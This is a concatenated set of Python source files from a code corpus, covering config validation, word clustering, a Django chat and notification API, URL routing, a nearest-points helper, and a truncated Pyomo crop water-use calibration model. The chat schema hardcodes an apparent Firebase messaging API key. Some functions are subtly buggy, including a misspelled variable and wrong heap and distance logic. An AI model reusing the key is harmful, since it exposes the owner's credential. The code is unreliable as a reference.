'CaaS network {} mapped to sriov interfaces {} in one host '\n msg += 'and sriov interfaces {} in another host'\n raise CaasValidationError(msg.format(net, interfaces,\n tenant_interfaces))\n return is_caas_network_present\n\n def validate_dns_domain(self):\n domain = self.caas_conf[self.DOMAIN_NAME]\n if not self.caas_utils.is_optional_param_present(self.DOMAIN_NAME, self.caas_conf):\n return\n if not re.match(self.DOMAIN_NAME_PATTERN, domain):\n raise CaasValidationError('{} is not a valid {} !'.format(\n domain,\n self.DOMAIN_NAME))\n","sub_path":"validators/src/CaasValidation.py","file_name":"CaasValidation.py","file_ext":"py","file_size_in_byte":18516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"581462694","text":"#!/usr/bin/env python3\n\n\"\"\"\nAuthor : Yukun Feng\nDate : 2018/06/20\nEmail : yukunfg@gmail.com\nDescription : Minimal text processing framework\n\"\"\"\n\nimport sys\nimport argparse\nimport re\nimport string\nimport collections\nimport os\nfrom collections import Counter\nimport numpy as np\nimport torchtext\n\n\ndef context_word_clustering(args):\n text_path = args.file_path\n freq_thre = args.freq_thre\n counter = Counter()\n lines = [\n counter.update(line.strip().split())\n for line in open(text_path, 'r').readlines()\n ]\n vocab = torchtext.vocab.Vocab(counter, specials=[])\n vocab_len = len(vocab.itos)\n token2context_words = np.zeros(\n (vocab_len, vocab_len),\n dtype=int\n )\n\n context_window = 1\n with open(text_path, 'r') as fh:\n for line in fh:\n line = line.strip()\n # Skip empty lines\n if line == \"\":\n continue\n # line = f\" {line} \"\n tokens = line.split()\n for count, token in enumerate(tokens, 0):\n # if token in [\"\", \"\"]:\n # continue\n if counter[token] > freq_thre:\n continue\n for context_window_i in range(-context_window, context_window + 1):\n if context_window_i == 0:\n continue\n if count + context_window_i < 0 or count + context_window_i > len(tokens) - 1:\n continue\n context_word = tokens[count + context_window_i]\n token_id = vocab.stoi[token]\n context_id = vocab.stoi[context_word]\n token2context_words[token_id][context_id] += 1\n\n # if token not in token2context_words:\n # token2context_words[token] = [0] * len(vocab.itos)\n # token2context_words[token][vocab.stoi[token]] += 1\n\n # for count, row in enumerate(token2context_words, 0):\n print(\"before matmul\")\n similarities = np.matmul(token2context_words, token2context_words.transpose())\n print(\"end matmul\")\n for token, freq in counter.most_common():\n token_index = vocab.stoi[token]\n similarity = similarities[token_index]\n print(f\"processing {token_index}\")\n # print(f\"{token}-{token_index}: {vec}\")\n # similarities = []\n # for row_index, row in enumerate(token2context_words, 0):\n # if row_index == token_index:\n # similarities.append(-1)\n # continue\n # similarity = np.dot(vec, row)\n # similarities.append(similarity)\n most_similar_indexs = sorted(\n range(len(similarity)),\n key=lambda k: similaritiy[k],\n reverse=True\n )\n print(f\"{token}: {[vocab.itos[j] for j in most_similar_indexs[0:10]]}\")\n \n # for k, v in token2context_words.items():\n # print(k, v)\n # set_v = set(v)\n # print(f\"{k}-{counter[k]} {len(v)} {len(set_v)}\") \n # print(set_v)\n # print(\"\")\n\n\ndef full_clustering(args):\n text_path = args.file_path\n freq_thre = args.freq_thre\n counter = Counter()\n lines = [\n counter.update(line.strip().split())\n for line in open(text_path, 'r').readlines()\n ]\n\n context2token = {}\n token2cluster = {}\n cluster_counter = 1\n fh = open(text_path, \"r\")\n for line_count, line in enumerate(fh, 1):\n line = line.strip()\n # Skip empty lines\n if line == \"\":\n continue\n line = f\" {line} \"\n tokens = line.split()\n for count, token in enumerate(tokens, 0):\n if count - 1 < 0 or count + 1 > len(tokens) - 1:\n continue\n if counter[token] > freq_thre:\n continue\n\n # making context\n prev_token = tokens[count - 1]\n next_token = tokens[count + 1]\n context = f\"{prev_token}_{next_token}\"\n\n if token not in token2cluster:\n if context not in context2token:\n token2cluster[token] = cluster_counter\n cluster_counter += 1\n context2token[context] = token\n else:\n token_given_c = context2token[context]\n token2cluster[token] = token2cluster[token_given_c]\n else:\n if context not in context2token:\n context2token[context] = token\n else:\n token_given_c = context2token[context]\n # updating the corresponding token clusters\n old_cluster = token2cluster[token]\n new_cluster = token2cluster[token_given_c]\n for corresponding_token, corresponding_cluster in token2cluster.items():\n if corresponding_cluster == old_cluster:\n token2cluster[corresponding_token] = new_cluster\n\n print_map(counter, token2cluster)\n\n\ndef loose_clustering(args):\n text_path = args.file_path\n freq_thre = args.freq_thre\n\n # get frequency of corpus\n counter = Counter()\n lines = [\n counter.update(line.strip().split())\n for line in open(text_path, 'r').readlines()\n ]\n\n fh = open(text_path, \"r\")\n context2tokens = {}\n for line in fh:\n line = line.strip()\n # Skip empty lines\n if line == \"\":\n continue\n\n tokens = line.split()\n for count, token in enumerate(tokens, 0):\n if count - 1 < 0 or count + 1 > len(tokens) - 1:\n continue\n if counter[token] > freq_thre:\n # if counter[token] < freq_thre:\n continue\n\n # making context\n prev_token = tokens[count - 1]\n next_token = tokens[count + 1]\n context = f\"{prev_token}_{next_token}\"\n if context not in context2tokens:\n context2tokens[context] = []\n # if token not in context2tokens[context]:\n context2tokens[context].append(token)\n fh.close()\n \n sorted_dict = collections.OrderedDict(\n sorted(context2tokens.items(), reverse=False, key=lambda t: len(t[1]))\n )\n token2cluster = {}\n cluster_counter = 1\n limit_thre_count = 1\n for k, v in sorted_dict.items():\n set_v = set(v)\n # print(f\"{k} {len(set_v)} {len(v)} {set_v}\") \n for token in set_v:\n if limit_thre_count >= len(sorted_dict.keys()) - 600:\n token2cluster[token] = cluster_counter\n else:\n token2cluster[token] = 0\n limit_thre_count += 1\n cluster_counter += 1\n\n\n print_map(counter, token2cluster, False)\n\n\ndef print_map(counter, token2cluster, verbose=False):\n cluster2tokens = {}\n for token in counter.keys():\n if token in token2cluster:\n cluster = token2cluster[token]\n print(f\"{token} <{cluster}>\")\n else:\n cluster = token\n print(f\"{token} {cluster}\")\n if cluster not in cluster2tokens:\n cluster2tokens[cluster] = []\n cluster2tokens[cluster].append(token)\n\n if verbose:\n print(\"\\ncluster2tokens\\n\")\n sorted_dict = collections.OrderedDict(\n sorted(cluster2tokens.items(), reverse=False, key=lambda t: len(t[1]))\n )\n for k, v in sorted_dict.items():\n print(f\"{k} {len(v)} {' '.join(v)}\")\n\n\ndef random_clustering(args):\n text_path = args.file_path\n freq_thre = args.freq_thre\n cluster_num = args.cluster_num\n\n # get frequency of corpus\n counter = Counter()\n lines = [\n counter.update(line.strip().split())\n for line in open(text_path, 'r').readlines()\n ]\n\n token2cluster = {}\n\n for token in counter.keys():\n if counter[token] > freq_thre:\n continue\n cluster = np.random.randint(0, cluster_num)\n token2cluster[token] = cluster\n\n print_map(counter, token2cluster, verbose=False)\n\n\ndef from_toolkit_clusters(args):\n freq_thre = args.freq_thre\n file_path = os.path.expanduser(args.file_path)\n # cluster_path = os.path.expanduser(\"./train.txt.full.skipgram.cluster\")\n cluster_path = os.path.expanduser(\"./clustercat/cluster.tsv\")\n counter = Counter()\n lines = [\n counter.update(line.strip().split())\n for line in open(file_path, 'r').readlines()\n ]\n\n token2cluster = {}\n\n with open(cluster_path, 'r') as fh:\n for line in fh:\n line = line.strip()\n # Skip empty lines\n if line == \"\":\n continue\n items = line.split()\n token = items[0]\n if counter[token] <= freq_thre:\n token2cluster[token] = items[1]\n\n print_map(counter, token2cluster, verbose=False)\n\n\nif __name__ == \"__main__\":\n np.random.seed(0)\n parser = argparse.ArgumentParser(\n description='clustering words by context pairs',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n '-file_path', help='file path', required=True\n )\n parser.add_argument(\n '-freq_thre', help='freq_thre',\n required=False, default=45, type=int\n )\n parser.add_argument(\n '-cluster_num', help='cluster_num',\n required=False, default=600, type=int\n )\n args = parser.parse_args()\n # full_clustering(args)\n # loose_clustering(args)\n # random_clustering(args)\n from_toolkit_clusters(args)\n # context_word_clustering(args)\n","sub_path":"data/wikitext-2/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":9677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"347977845","text":"from .models import Chat\nfrom Farm.models import Farm\nfrom Buyer.models import Buyer\nfrom Sales.models import Sale\nimport graphene\nfrom graphene_django import DjangoObjectType\nfrom pyfcm import FCMNotification\n\n\nclass ChatType(DjangoObjectType):\n class Meta:\n model = Chat\n\n\nclass Query(graphene.ObjectType):\n chats = graphene.List(ChatType)\n\n def resolve_chats(self, info):\n return Chat.objects.all()\n\n\nclass AddChat(graphene.Mutation):\n chat = graphene.Field(ChatType)\n\n class Arguments:\n BuyerId = graphene.Int(required=True)\n SellerId = graphene.Int(required=True)\n SaleId = graphene.Int(required=True)\n DocId = graphene.String(required=True)\n\n def mutate(self, info, BuyerId, SellerId, DocId, SaleId=None):\n buyer = Buyer.objects.get(id=BuyerId)\n seller = Farm.objects.get(id=SellerId)\n chat = Chat(partyA=buyer, partyB=seller, docId=DocId)\n if SaleId:\n sale = Sale.objects.get(id=SaleId)\n chat.sale = sale\n chat.save()\n\n return AddChat(chat=chat)\n\n\nclass SendNotification(graphene.Mutation):\n chat = graphene.Field(ChatType)\n\n class Arguments:\n partyId = graphene.Int(required=True)\n type = graphene.String(required=True)\n Message = graphene.String(required=True)\n title = graphene.String(required=True)\n action = graphene.String(required=True)\n\n def mutate(self, info, partyId, type, Message, title, action):\n push = FCMNotification(\n api_key=\"AAAAr7bm4Pw:APA91bGzMCMzPkoSPvqXkbSFGe5cRBjMDWRKV8tIkVGg76UwcYARrmMWrQjkx9fDsG\"\n \"GcrrfcDbkLuhvmmeDtzPsdW22MnNzND_14rEMVTLOpGXL67G8tj88sKQrKrs0iIhWxXwqGEbiA\")\n if type == \"buyer\":\n print(\"Buyer Being Sent\")\n print(partyId)\n # print(type(partyId))\n buyer = Buyer.objects.get(id=partyId)\n regid = buyer.owner.fcm_id\n print(regid)\n result = push.notify_single_device(registration_id=regid, message_title=title, message_body=Message)\n print(result)\n else:\n print(\"Seller Being Sent Notification\")\n print(partyId)\n # print(type(partyId))\n farm = Farm.objects.get(id=partyId)\n regid = farm.owner.fcm_id\n print(regid)\n result = push.notify_single_device(registration_id=regid, message_title=title, message_body=Message)\n print(result)\n\n\nclass Mutation(graphene.ObjectType):\n addChat = AddChat.Field()\n notify = SendNotification.Field()\n","sub_path":"app/Chats/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336663524","text":"from django.conf.urls import include, url\nfrom rest_framework import routers\n\nfrom rdmo.core.views import SettingsViewSet\n\nfrom .views import (ConditionsExportView, ConditionsImportXMLView,\n ConditionsView)\nfrom .viewsets import (AttributeViewSet, ConditionApiViewSet, ConditionViewSet,\n OptionViewSet, RelationViewSet)\n\n# regular views\nconditions_patterns = [\n url(r'^$', ConditionsView.as_view(), name='conditions'),\n url(r'^export/(?P[a-z]+)/$', ConditionsExportView.as_view(), name='conditions_export'),\n url(r'^import/(?P[a-z]+)/$', ConditionsImportXMLView.as_view(), name='conditions_import'),\n]\n\n# internal AJAX API\ninternal_router = routers.DefaultRouter()\ninternal_router.register(r'conditions', ConditionViewSet, base_name='condition')\ninternal_router.register(r'attributes', AttributeViewSet, base_name='attribute')\ninternal_router.register(r'options', OptionViewSet, base_name='option')\ninternal_router.register(r'relations', RelationViewSet, base_name='relation')\ninternal_router.register(r'settings', SettingsViewSet, base_name='setting')\n\nconditions_patterns_internal = [\n url(r'^', include(internal_router.urls)),\n]\n\n# programmable API\napi_router = routers.DefaultRouter()\napi_router.register(r'conditions', ConditionApiViewSet, base_name='condition')\n\nconditions_patterns_api = [\n url(r'^', include(api_router.urls)),\n]\n","sub_path":"rdmo/conditions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"293666977","text":"class Solution(object):\n # heap queue O(nlgk)\n def findKthLargest(self, array, origin, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n h = []\n for p in array:\n d = self.getDistance(origin, p)\n if len(h) < k:\n heapq.heappush(h, (d, p))\n else:\n heapq.heappush(h, (d, p))\n h.pop()\n return h[-1]\n\n\n def getDistance(self, p1, p2):\n return ((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1])) ** 0.5","sub_path":"kth_closest_point.py","file_name":"kth_closest_point.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"108216186","text":"# pmp calibrated costs for both sw and gw\n\nimport os\nimport sys\nglobal basepath\nprint(os.path.dirname(sys.argv[0]))\n##basepath = os.path.dirname(sys.argv[0]).split(__file__)[0]\nfrom pyomo.environ import * # JY temp\nfrom pyomo.opt import SolverFactory\nimport pandas as pd\nimport numpy as np\ntry:\n import cPickle as pickle\nexcept ImportError: # python 3.x\n import pickle\nimport pdb\n\n\n#data_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_v1.xlsx\")\n#data_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_20201005.xlsx\")\n#data_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_20201028_GW.xlsx\")\n#data_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_20220223_GW.xlsx\")\n#data_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_20220311_GW.xlsx\")\ndata_file=pd.ExcelFile(\"data_inputs/MOSART_WM_PMP_inputs_20220323_GW.xlsx\")\ndata_profit = data_file.parse(\"Profit\")\ndata_profit['area_irrigated'] = data_profit['area_irrigated'] * 1000\ndata_profit['area_irrigated_gw'] = data_profit['area_irrigated_gw'] * 1000\ndata_profit['area_irrigated_sw'] = data_profit['area_irrigated_sw'] * 1000\naggregation_functions = {'area_irrigated_sw': 'sum'}\narea_irrigated_sw_farm = data_profit.groupby(['nldas'], as_index=False).aggregate(aggregation_functions)\naggregation_functions = {'area_irrigated_gw': 'sum'}\narea_irrigated_gw_farm = data_profit.groupby(['nldas'], as_index=False).aggregate(aggregation_functions)\n\n#data_constraint = data_file.parse(\"Constraint\")\n\nnldas_ids=data_profit[\"nldas\"][0:53835].tolist()\n\n## B.1. Preparing model indices and constraints:\n#ids = range(592185) # total number of crop and nldas ID combinations\nids = range(538350) # total number of crop and nldas ID combinations\nfarm_ids = range(53835) # total number of farm agents / nldas IDs\nsd_no = len(farm_ids)\ncrop_types=[str(i) for i in list(pd.unique(data_profit[\"crop\"]))]\ncrop_no=len(crop_types)\ncrop_ids_by_farm_and_constraint={}\nland_constraints_by_farm={}\nwater_constraints_by_farm={}\n#crop_ids_by_farm=dict(enumerate([np.where(data_profit[\"nldas\"]==nldas_ids[i])[0].tolist() for i in range(53835)])) #JY this takes forever, find better way\nwith open('data_inputs/pickles/crop_ids_by_farm.p', 'rb') as fp:\n crop_ids_by_farm = pickle.load(fp)\n# with open('data_inputs/max_land_constr_20201102.p', 'rb') as fp:\n# land_constraints_by_farm = pickle.load(fp, encoding='latin1')\nwith open('data_inputs/pickles/max_land_constr_20220307_protocol2.p', 'rb') as fp:\n land_constraints_by_farm = pickle.load(fp, encoding='latin1')\nwith open('data_inputs/pickles/water_constraints_by_farm_v2.p', 'rb') as fp:\n water_constraints_by_farm = pickle.load(fp, encoding='latin1')\nwith open('data_inputs/pickles/crop_ids_by_farm_and_constraint.p', 'rb') as fp:\n crop_ids_by_farm_and_constraint = pickle.load(fp)\n\n#Revise to account for removal of \"Fodder_Herb category\"\ncrop_ids_by_farm_new = {}\nfor i in crop_ids_by_farm:\n crop_ids_by_farm_new[i] = crop_ids_by_farm[i][0:10]\ncrop_ids_by_farm = crop_ids_by_farm_new\ncrop_ids_by_farm_and_constraint = crop_ids_by_farm_new\n\nwater_constraints_by_farm = dict.fromkeys(water_constraints_by_farm, 9999999999)\n\n# JY this outputs pandas series for each entry of land_constraints_by_farm and water_constraints_by_farm; need\n# to convert to float\n# for i in range(53835):\n# #crop_ids_by_farm_and_constraint[i]=np.where((data_profit[\"nldas\"]==nldas_ids[i]))[0].tolist()\n# constraint_ids=np.where((data_constraint[\"nldas\"]==nldas_ids[i]))[0]\n# #land_constraints_by_farm[i]=data_constraint.iloc[constraint_ids][\"land_constraint\"].astype('float')\n# water_constraints_by_farm_2[i]=data_constraint.iloc[constraint_ids][\"water_constraint\"].astype('float')\n\n# Replace NIRs with 0 value to 0.1 (nominal irrigation) to account for inconsistency between observed surface water irrigated area and NIR\n\n## B.2. Preparing linear profit coefficients:\nprices=data_profit[\"price\"]\nyields=data_profit[\"yield\"]\nland_costs=data_profit[\"land_cost\"]\nwater_nirs=data_profit[\"nir_corrected\"]\nsw_costs=data_profit[\"sw_cost\"] #JY need to fill in gaps for DC, figure out how to handle groundwater costs\ngw_costs=data_profit[\"gw_cost\"]\ndata_profit[\"alpha\"] = 0\nalphas_total=data_profit[\"alpha\"]\nalphas_sw=data_profit[\"alpha\"].head(53835) # ids for surface water are farm specific (summed over all crops)\n\n# linear_term_sum=[p*y - c - (swc*n) - (gwc*n) - aland - asw for p,y,c,swc,gwc,n,aland,asw in zip(prices,yields,land_costs,sw_costs,gw_costs,water_nirs,alphas_land,alphas_sw)]\nlinear_term_sum_total = [p*y - c - aland for p,y,c,aland in zip(prices,yields,land_costs,alphas_total)]\nlinear_term_sum_sw = [-(swc*n*1000) for swc,n in zip(sw_costs,water_nirs)] # multiply by 1000 to get to non-corrected NIRs\nlinear_term_sum_gw = [-(gwc*n*1000) for gwc,n in zip(gw_costs,water_nirs)]\n# linear_term_sum_gw = [p*y - c - (gwc*n) - aland for p,y,c,gwc,n,aland in zip(prices,yields,land_costs,gw_costs,water_nirs,alphas_total)]\n\n## B.3. Preparing model vars and params: (these need to be dict()!)\ngammas_total=dict(data_profit[\"gamma\"]) #JY temporarily set at 100\ngammas_sw=dict(data_profit[\"gamma\"].head(53835)) #JY temporarily set at 100\nnet_prices_total=dict(enumerate(linear_term_sum_total))\nnet_prices_sw=dict(enumerate(linear_term_sum_sw))\nnet_prices_gw=dict(enumerate(linear_term_sum_gw))\nx_start_values=dict(enumerate([0.0]*3))\nnirs=dict(water_nirs)\n\n\n## C.1. Constructing model inputs:\nfwm = ConcreteModel()\nfwm.ids = Set(initialize=ids)\n# fwm.ids = Set(initialize=crop_ids_by_farm)\nfwm.farm_ids = Set(initialize=farm_ids)\nfwm.crop_ids_by_farm = Set(fwm.farm_ids, initialize=crop_ids_by_farm)\nfwm.crop_ids_by_farm_and_constraint = Set(fwm.farm_ids, initialize=crop_ids_by_farm_and_constraint)\nfwm.net_prices_total = Param(fwm.ids, initialize=net_prices_total, mutable=True)\nfwm.net_prices_sw = Param(fwm.ids, initialize=net_prices_sw, mutable=True)\nfwm.net_prices_gw = Param(fwm.ids, initialize=net_prices_gw, mutable=True)\nfwm.gammas_total = Param(fwm.ids, initialize=gammas_total, mutable=True)\nfwm.alphas_sw = Param(fwm.farm_ids, initialize=alphas_sw, mutable=True)\nfwm.gammas_sw = Param(fwm.farm_ids, initialize=gammas_sw, mutable=True)\nfwm.land_constraints = Param(fwm.farm_ids, initialize=land_constraints_by_farm, mutable=True)\nfwm.water_constraints = Param(fwm.farm_ids, initialize=water_constraints_by_farm, mutable=True)\nfwm.xs_total = Var(fwm.ids, domain=NonNegativeReals, initialize=x_start_values)\nfwm.xs_sw = Var(fwm.ids, domain=NonNegativeReals, initialize=x_start_values)\nfwm.xs_gw = Var(fwm.ids, domain=NonNegativeReals, initialize=x_start_values)\nobs_lu_total = dict(data_profit[\"area_irrigated\"])\nobs_lu_sw = dict(area_irrigated_sw_farm[\"area_irrigated_sw\"])\nobs_lu_gw = dict(area_irrigated_gw_farm[\"area_irrigated_gw\"])\ncrop_counter = 0\n# for key,value in obs_lu_total.items(): # JY TEMP comment out\n# if crop_counter == 53835:\n# crop_counter = 0\n# if value == 0:\n# obs_lu_total[key] = .0001 # NEED TO ACCOUNT FOR THIS IN OBS_LU_SW below\n# obs_lu_sw[crop_counter] += .00005 # JY revised from .0001\n# crop_counter += 1\nfwm.obs_lu_total = Param(fwm.ids, initialize=obs_lu_total, mutable=True)\nfwm.obs_lu_sw = Param(fwm.farm_ids, initialize=obs_lu_sw, mutable=True) # JY EDIT\nfwm.obs_lu_gw = Param(fwm.farm_ids, initialize=obs_lu_gw, mutable=True) # JY EDIT\nfwm.nirs = Param(fwm.ids, initialize=nirs, mutable=True)\n\n## C.2. Constructing model functions: #!JY! test multiply by 1000 to get non-adjusted NIR\ndef obj_fun(fwm):\n return sum(sum((fwm.net_prices_total[h] * fwm.xs_total[h]) for h in fwm.crop_ids_by_farm[f]) +\n sum((fwm.net_prices_sw[i] * fwm.xs_sw[i]) for i in fwm.crop_ids_by_farm[f]) +\n sum((fwm.net_prices_gw[g] * fwm.xs_gw[g]) for g in fwm.crop_ids_by_farm[f]) for f in fwm.farm_ids) # JY double check this!\nfwm.obj_f = Objective(rule=obj_fun, sense=maximize)\n\n# JY need to re-implement this\n# def land_constraint(fwm, ff):\n# return sum(fwm.xs[i] for i in fwm.crop_ids_by_farm_and_constraint[ff]) <= fwm.land_constraints[ff]\n# fwm.c1 = Constraint(fwm.farm_ids, rule=land_constraint)\n\n\ndef obs_lu_constraint_total(fwm, i):\n return fwm.xs_total[i] == fwm.obs_lu_total[i]\nfwm.c3 = Constraint(fwm.ids, rule=obs_lu_constraint_total)\n\ndef obs_lu_constraint_sw(fwm, f):\n return sum(fwm.xs_sw[i] for i in fwm.crop_ids_by_farm[f]) == fwm.obs_lu_sw[f]\nfwm.c4 = Constraint(fwm.farm_ids, rule=obs_lu_constraint_sw)\n\ndef obs_lu_constraint_gw(fwm, f): # JY ADD\n return sum(fwm.xs_gw[i] for i in fwm.crop_ids_by_farm[f]) == fwm.obs_lu_gw[f]\nfwm.c6 = Constraint(fwm.farm_ids, rule=obs_lu_constraint_gw)\n\n# def obs_lu_constraint_sw(fwm, i):\n# return fwm.xs_sw[i] == fwm.obs_lu_sw[i]\n# fwm.c4 = Constraint(fwm.ids, rule=obs_lu_constraint_sw)\n\n# def water_constraint(fwm, ff):\n# return sum(fwm.xs_sw[i]*fwm.nirs[i] for i in fwm.crop_ids_by_farm_and_constraint[ff]) <= fwm.water_constraints[ff]\n# fwm.c2 = Constraint(fwm.farm_ids, rule=water_constraint)\n\n# def obs_lu_constraint_sum(fwm, i):\n# return fwm.xs_sw[i] + fwm.xs_gw[i] == fwm.xs_total[i]\n# fwm.c5 = Constraint(fwm.ids, rule=obs_lu_constraint_sum)\n\nfwm.dual = Suffix(direction=Suffix.IMPORT)\n#\n# def water_constraint(fwm, ff):\n# return sum(fwm.xs_sw[i]*fwm.nirs[i] for i in fwm.crop_ids_by_farm_and_constraint[ff]) <= fwm.water_constraints[ff]\n# fwm.c2 = Constraint(fwm.farm_ids, rule=water_constraint)\n\n## C.3. Solve\nopt = SolverFactory(\"ipopt\", solver_io='nl')\nresults = opt.solve(fwm, keepfiles=False, tee=True)\nprint(results.solver.termination_condition)\n\n## C.1.d. Save duals:\nfrom pyomo.core import Constraint\n\nobs_lu_duals_total = dict()\nfor c in fwm.component_objects(Constraint, active=True):\n if str(c) == \"c3\":\n cobject = getattr(fwm, str(c))\n for index in cobject:\n obs_lu_duals_total[index] = fwm.dual[cobject[index]]\n\nobs_lu_duals_sw = dict()\nfor c in fwm.component_objects(Constraint, active=True):\n if str(c) == \"c4\":\n cobject = getattr(fwm, str(c))\n for index in cobject:\n obs_lu_duals_sw[index] = fwm.dual[cobject[index]]\n\nobs_lu_duals_gw = dict()\nfor c in fwm.component_objects(Constraint, active=True):\n if str(c) == \"c6\":\n cobject = getattr(fwm, str(c))\n for index in cobject:\n obs_lu_duals_gw[index] = fwm.dual[cobject[index]]\n\n# ## C.1.e. 1st stage result: Calculate alpha and gamma:\n# # gamma1 = [((2. * a / b) if (b > 0.0) else 0.0) for a,b in zip(obs_lu_duals.values(),obs_lu.values())]\n# gamma1 = [((a / b) if (b > 0.0) else 0.0) for a, b in zip(obs_lu_duals.values(), obs_lu.values())]\n# alpha1 = [-(0.5 * a * b) for a, b in zip(gamma1, obs_lu.values())]\n# print(alpha1)\n# print(\"+++ alpha check: +++\")\n# print([(a, b) for a, b in zip(alphas, alpha1)])\n# print(\"+++ gamma check: +++\")\n# print([(a, b) for a, b in zip(gammas, gamma1)])\n# alphas = alpha1\n# linear_term_sum=[p*y - c - wc*n - a for p,y,c,wc,n,a in zip(prices,yields,land_costs,sw_costs,water_nirs,alphas)]\n# gammas = dict(enumerate(gamma1))\n# net_prices = dict(enumerate(linear_term_sum))\n\n## C.1.e. 1st stage result: Calculate alpha and gamma:\n# gamma1 = [((2. * a / b) if (b > 0.0) else 0.0) for a,b in zip(obs_lu_duals.values(),obs_lu.values())]\ngamma1_total = [((2. * a / b) if (b > 0.0) else 0.0) for a, b in zip(obs_lu_duals_total.values(), obs_lu_total.values())]\nalpha1_total = [-(0.5 * a * b) for a, b in zip(gamma1_total, obs_lu_total.values())]\nprint(alpha1_total)\nprint(\"+++ alpha check: +++\")\nprint([(a, b) for a, b in zip(alphas_total, alpha1_total)])\nprint(\"+++ gamma check: +++\")\nprint([(a, b) for a, b in zip(gammas_total, gamma1_total)])\nalphas_total = alpha1_total\n\nlinear_term_sum_total = [p*y - c - aland for p,y,c,aland in zip(prices, yields, land_costs, alphas_total)]\ngammas_total = dict(enumerate(gamma1_total))\n\nnet_prices_total = dict(enumerate(linear_term_sum_total))\n\ngamma1_sw = [((2. * a / b) if (b > 0.0) else 0.0) for a, b in zip(obs_lu_duals_sw.values(), obs_lu_sw.values())]\nalpha1_sw = [-(0.5 * a * b) for a, b in zip(gamma1_sw, obs_lu_sw.values())]\nprint(alpha1_sw)\nprint(\"+++ alpha check: +++\")\nprint([(a, b) for a, b in zip(alphas_sw, alpha1_sw)])\nprint(\"+++ gamma check: +++\")\nprint([(a, b) for a, b in zip(gammas_sw, gamma1_sw)])\nalphas_sw = dict(enumerate(alpha1_sw))\ngammas_sw = dict(enumerate(gamma1_sw))\n\ngamma1_gw = [((2. * a / b) if (b > 0.0) else 0.0) for a, b in zip(obs_lu_duals_gw.values(), obs_lu_gw.values())]\nalpha1_gw = [-(0.5 * a * b) for a, b in zip(gamma1_gw, obs_lu_gw.values())]\nprint(alpha1_gw)\nalphas_gw = dict(enumerate(alpha1_gw))\ngammas_gw = dict(enumerate(gamma1_gw))\n\nimport datetime\nstart_time = datetime.datetime.now()\n# chunk_size = 555 # JY temp, eventually convert into a loop\nchunk_size = 1\nno_of_chunks = len(farm_ids) / chunk_size\n\nfirst = True\nfor n in [1]:\n# for n in range(int(1)):\n# for n in range(int(no_of_chunks)):\n print('starting chunk: ' + str(n))\n # subset farm ids\n # farm_ids_subset = list(range(chunk_size*n, chunk_size*(n+1)))\n farm_ids_subset = list(range(36335, 36336))\n # subset crop ids\n crop_ids_by_farm_subset = {key: crop_ids_by_farm[key] for key in farm_ids_subset}\n ids_subset = []\n for key,list_value in crop_ids_by_farm_subset.items():\n for value in list_value:\n ids_subset.append(value)\n ids_subset_sorted = sorted(ids_subset)\n\n # subset various dictionaries;\n keys_to_extract = list(range(chunk_size*n, chunk_size*(n+1))) # will multiply start and end values by n+1 once integrated in loop\n net_prices_total_subset = {key: net_prices_total[key] for key in ids_subset_sorted}\n net_prices_sw_subset = {key: net_prices_sw[key] for key in ids_subset_sorted}\n net_prices_gw_subset = {key: net_prices_gw[key] for key in ids_subset_sorted}\n # net_prices_gw_subset.update((x, y*2) for x, y in net_prices_gw_subset.items()) ### JY TEMP\n gammas_total_subset = {key: gammas_total[key] for key in ids_subset_sorted}\n nirs_subset = {key: nirs[key] for key in ids_subset_sorted}\n alphas_sw_subset = {key: alphas_sw[key] for key in farm_ids_subset}\n gammas_sw_subset = {key: gammas_sw[key] for key in farm_ids_subset}\n alphas_gw_subset = {key: alphas_gw[key] for key in farm_ids_subset}\n gammas_gw_subset = {key: gammas_gw[key] for key in farm_ids_subset}\n land_constraints_by_farm_subset = {key: land_constraints_by_farm[key] for key in farm_ids_subset}\n water_constraints_by_farm_subset = {key: water_constraints_by_farm[key] for key in farm_ids_subset}\n # water_constraints_by_farm_subset[36335] = 63026538.58 ### JY TEMP\n\n # set price to zero for gammas that are zero\n for key,value in gammas_total_subset.items():\n if value == 0:\n net_prices_total_subset[key] = -9999999999\n\n ## C.2. 2st stage: Quadratic model included in JWP model simulations\n ## C.2.a. Constructing model inputs:\n ## (repetition to be safe - deepcopy does not work on PYOMO models)\n ## C.1. Constructing model inputs:\n fwm_s = ConcreteModel()\n fwm_s.ids = Set(initialize=ids_subset_sorted)\n fwm_s.farm_ids = Set(initialize=farm_ids_subset)\n fwm_s.crop_ids_by_farm = Set(fwm_s.farm_ids, initialize=crop_ids_by_farm_subset)\n fwm_s.crop_ids_by_farm_and_constraint = Set(fwm_s.farm_ids, initialize=crop_ids_by_farm_subset)\n fwm_s.net_prices_sw = Param(fwm_s.ids, initialize=net_prices_sw_subset, mutable=True)\n fwm_s.net_prices_total = Param(fwm_s.ids, initialize=net_prices_total_subset, mutable=True)\n fwm_s.net_prices_gw = Param(fwm_s.ids, initialize=net_prices_gw_subset, mutable=True)\n fwm_s.gammas_total = Param(fwm_s.ids, initialize=gammas_total_subset, mutable=True)\n fwm_s.alphas_sw = Param(fwm_s.farm_ids, initialize=alphas_sw_subset, mutable=True)\n fwm_s.gammas_sw = Param(fwm_s.farm_ids, initialize=gammas_sw_subset, mutable=True)\n fwm_s.alphas_gw = Param(fwm_s.farm_ids, initialize=alphas_gw_subset, mutable=True)\n fwm_s.gammas_gw = Param(fwm_s.farm_ids, 